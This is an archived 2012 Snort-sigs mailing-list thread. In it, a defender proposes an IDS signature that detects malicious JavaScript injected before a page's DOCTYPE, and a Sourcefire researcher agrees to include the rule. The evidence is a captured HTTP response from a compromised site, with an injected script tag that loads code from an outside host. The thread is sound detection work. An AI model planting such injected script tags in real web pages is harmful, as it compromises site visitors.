[prev in list] [next in list] [prev in thread] [next in thread]
List: snort-sigs
Subject: Re: [Snort-sigs] SIG: Script before DOCTYPE
From: "Lay, James" <james.lay () wincofoods ! com>
Date: 2012-06-21 19:38:58
Message-ID: 65036AEB7E41D04FB34071B1081889A90409B150 () GOMAIL ! go ! winco ! local
[Download RAW message or body]
--===============5294094191722878136==
Content-class: urn:content-classes:message
Content-Type: multipart/alternative;
boundary="----_=_NextPart_001_01CD4FE5.8066FD9A"
This is a multi-part message in MIME format.
Go for it Alex...thank you.
James
From: Alex Kirk [mailto:akirk@sourcefire.com]
Sent: Thursday, June 21, 2012 1:37 PM
To: Lay, James
Cc: snort-sigs@lists.sourceforge.net
Subject: Re: [Snort-sigs] SIG: Script before DOCTYPE
That actually seems reasonable. You should only ever see <!DOCTYPE at
the start of a page, so I'd be surprised if this generates false
positives.
Would you like this to be included in the VRT set?
On Thu, Jun 21, 2012 at 3:27 PM, Lay, James <james.lay@wincofoods.com>
wrote:
All,
Not sure if this is a good sig or not:
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALWARE
script before DOCTYPE possible malicious redirect";
flow:to_client,established; file_data; content:"</script><!DOCTYPE";
distance:0; nocase; metadata:policy security-ips drop, service http;
classtype:web-application-attack; sid:xxxxxxx; rev:1;)
Many times that I've seen malicious JavaScript injected it's usually
right at the top:
HTTP/1.1 200 OK
Date: Mon, 18 Jun 2012 17:29:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: frontend=bleh; expires=Sun, 16-Sep-2012 17:29:21 GMT;
path=/; domain=www.glasstilestore.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Set-Cookie: frontend=bleh; expires=Sun, 16-Sep-2012 17:29:21 GMT;
path=/; domain=www.glasstilestore.com; httponly
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
dd13
<script src='http://httpjs.com/api'
type='text/javascript'></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML
1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<!-- Google Website Optimizer Control Script -->
<script>
I welcome any pointers or reasons this sig stinks...danke J
James
------------------------------------------------------------------------
------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond.
Discussions
will include endpoint security, mobile security and the latest in
malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org
Please visit http://blog.snort.org for the latest news about Snort!
--
Alex Kirk
AEGIS Program Lead
Sourcefire Vulnerability Research Team
+1-410-423-1937
alex.kirk@sourcefire.com
[Attachment #3 (text/html)]
<html xmlns:v="urn:schemas-microsoft-com:vml" \
xmlns:o="urn:schemas-microsoft-com:office:office" \
xmlns:w="urn:schemas-microsoft-com:office:word" \
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" \
xmlns="http://www.w3.org/TR/REC-html40"><head><meta http-equiv=Content-Type \
content="text/html; charset=us-ascii"><meta name=Generator content="Microsoft Word 14 \
(filtered medium)"><style><!-- /* Font Definitions */
@font-face
{font-family:Wingdings;
panose-1:5 0 0 0 0 0 0 0 0 0;}
@font-face
{font-family:Wingdings;
panose-1:5 0 0 0 0 0 0 0 0 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0in;
margin-bottom:.0001pt;
font-size:12.0pt;
font-family:"Times New Roman","serif";}
a:link, span.MsoHyperlink
{mso-style-priority:99;
color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-priority:99;
color:purple;
text-decoration:underline;}
span.hoenzb
{mso-style-name:hoenzb;}
span.EmailStyle18
{mso-style-type:personal-reply;
font-family:"Calibri","sans-serif";
color:#1F497D;}
.MsoChpDefault
{mso-style-type:export-only;
font-family:"Calibri","sans-serif";}
@page WordSection1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;}
div.WordSection1
{page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple><div \
class=WordSection1><p class=MsoNormal><span \
style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'>Go for it \
Alex…thank you.<o:p></o:p></span></p><p class=MsoNormal><span \
style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'><o:p> </o:p></span></p><p \
class=MsoNormal><span \
style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'>James<o:p></o:p></span></p><p \
class=MsoNormal><span \
style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'><o:p> </o:p></span></p><div \
style='border:none;border-left:solid blue 1.5pt;padding:0in 0in 0in 4.0pt'><div><div \
style='border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0in 0in 0in'><p \
class=MsoNormal><b><span \
style='font-size:10.0pt;font-family:"Tahoma","sans-serif"'>From:</span></b><span \
style='font-size:10.0pt;font-family:"Tahoma","sans-serif"'> Alex Kirk \
[mailto:akirk@sourcefire.com] <br><b>Sent:</b> Thursday, June 21, 2012 1:37 \
PM<br><b>To:</b> Lay, James<br><b>Cc:</b> \
snort-sigs@lists.sourceforge.net<br><b>Subject:</b> Re: [Snort-sigs] SIG: Script \
before DOCTYPE<o:p></o:p></span></p></div></div><p \
class=MsoNormal><o:p> </o:p></p><p class=MsoNormal>That actually seems \
reasonable. You should only ever see <!DOCTYPE at the start of a page, so I'd be \
surprised if this generates false positives. <o:p></o:p></p><div><p \
class=MsoNormal><o:p> </o:p></p></div><div><p class=MsoNormal \
style='margin-bottom:12.0pt'>Would you like this to be included in the VRT \
set?<o:p></o:p></p><div><p class=MsoNormal>On Thu, Jun 21, 2012 at 3:27 PM, Lay, \
James <<a href="mailto:james.lay@wincofoods.com" \
target="_blank">james.lay@wincofoods.com</a>> wrote:<o:p></o:p></p><div><div><p \
class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>All,<o:p></o:p></p><p \
class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'> <o:p></o:p></p><p \
class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Not sure \
if this is a good sig or not:<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'> <o:p></o:p></p><p \
class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>alert tcp \
$EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALWARE script before \
DOCTYPE possible malicious redirect"; flow:to_client,established; file_data; \
content:"</script><!DOCTYPE"; distance:0; nocase; metadata:policy \
security-ips drop, service http; classtype:web-application-attack; sid:xxxxxxx; \
rev:1;)<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'> <o:p></o:p></p><p \
class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Many times \
that I’ve seen malicious JavaScript injected it’s usually right at the \
top:<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'> <o:p></o:p></p><p \
class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'> <o:p></o:p></p><p \
class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>HTTP/1.1 \
200 OK<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Date: Mon, 18 Jun 2012 \
17:29:21 GMT<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Server: \
Apache<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>X-Powered-By: \
PHP/5.2.17<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Set-Cookie: frontend=bleh; \
expires=Sun, 16-Sep-2012 17:29:21 GMT; path=/; domain=<a \
href="http://www.glasstilestore.com" target="_blank">www.glasstilestore.com</a>; \
HttpOnly<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Expires: Thu, 19 Nov 1981 \
08:52:00 GMT<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Cache-Control: no-store, \
no-cache, must-revalidate, post-check=0, pre-check=0<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Pragma: \
no-cache<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Set-Cookie: frontend=bleh; \
expires=Sun, 16-Sep-2012 17:29:21 GMT; path=/; domain=<a \
href="http://www.glasstilestore.com" target="_blank">www.glasstilestore.com</a>; \
httponly<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Vary: \
Accept-Encoding,User-Agent<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>X-UA-Compatible: \
IE=8<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Keep-Alive: timeout=3, \
max=100<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Connection: \
Keep-Alive<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Transfer-Encoding: \
chunked<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>Content-Type: text/html; \
charset=UTF-8<o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>dd13<o:p></o:p></p><p \
class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'><script \
src='<a href="http://httpjs.com/api" target="_blank">http://httpjs.com/api</a>' \
type='text/javascript'></script><!DOCTYPE html PUBLIC "-//W3C//DTD \
XHTML 1.0 Strict//EN" "<a \
href="http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" \
target="_blank">http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd</a>"><o:p></o:p></p><p \
class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'><html \
xmlns="<a href="http://www.w3.org/1999/xhtml" \
target="_blank">http://www.w3.org/1999/xhtml</a>" xml:lang="en" \
lang="en"><o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'><head><o:p></o:p></p><p \
class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'><!-- \
Google Website Optimizer Control Script --><o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'><script><o:p></o:p></p><p \
class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'> <o:p></o:p></p><p \
class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'>I welcome \
any pointers or reasons this sig stinks…danke <span \
style='font-family:Wingdings'>J</span><o:p></o:p></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'><span \
style='color:#888888'> <o:p></o:p></span></p><p class=MsoNormal \
style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'><span \
style='color:#888888'>James <o:p></o:p></span></p></div></div><p \
class=MsoNormal><br>------------------------------------------------------------------------------<br>Live \
Security Virtual Conference<br>Exclusive live event will cover all the ways today's \
security and<br>threat landscape has changed and how IT managers can respond. \
Discussions<br>will include endpoint security, mobile security and the latest in \
malware<br>threats. <a \
href="http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/" \
target="_blank">http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/</a><br>_______________________________________________<br>Snort-sigs \
mailing list<br><a href="mailto:Snort-sigs@lists.sourceforge.net">Snort-sigs@lists.sourceforge.net</a><br><a \
href="https://lists.sourceforge.net/lists/listinfo/snort-sigs" \
target="_blank">https://lists.sourceforge.net/lists/listinfo/snort-sigs</a><br><a \
href="http://www.snort.org" \
target="_blank">http://www.snort.org</a><br><br><br>Please visit <a \
href="http://blog.snort.org" target="_blank">http://blog.snort.org</a> for the latest \
news about Snort!<o:p></o:p></p></div><p class=MsoNormal><br><br \
clear=all><o:p></o:p></p><div><p class=MsoNormal><o:p> </o:p></p></div><p \
class=MsoNormal>-- <br>Alex Kirk<br>AEGIS Program Lead<br>Sourcefire Vulnerability \
Research Team<br>+1-410-423-1937<br><a \
href="mailto:alex.kirk@sourcefire.com">alex.kirk@sourcefire.com</a><o:p></o:p></p></div></div></div></body></html>
[Attachment #4 (--===============5294094191722878136==)]
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org
Please visit http://blog.snort.org for the latest news about Snort!
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic